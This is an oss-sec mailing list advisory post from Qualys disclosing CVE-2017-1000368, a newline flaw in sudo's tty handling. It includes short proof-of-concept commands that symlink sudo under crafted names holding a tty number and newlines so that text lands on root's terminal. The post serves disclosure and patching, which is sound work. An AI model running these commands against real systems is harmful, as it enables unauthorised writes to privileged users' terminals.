oss-sec mailing list archives
Re: Arbitrary terminal access via sudo on Linux
From: Qualys Security Advisory <qsa () qualys com>
Date: Tue, 6 Jun 2017 15:31:00 -0700
On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
However, the arbitrary tty access IS exploitable in 1.8.20p1.
For example, against Sudo < 1.8.20p1: $ /usr/bin/sudo -l ... User john may run the following commands on localhost: (nobody) /usr/bin/sum $ ln -s /usr/bin/sudo ' 1026 ' (1026 is tty2, currently used by root) $ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' (this is written to root's tty2) Or, against Sudo = 1.8.20p1: $ ln -s /usr/bin/sudo $') 1026 \n' $ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' CVE-2017-1000368 was assigned to this newline vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368 With best regards, -- the Qualys Security Advisory team
Current thread:
- Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Kurt Seifried (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Qualys Security Advisory (Jun 06)
- Re: Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Kurt Seifried (Jun 02)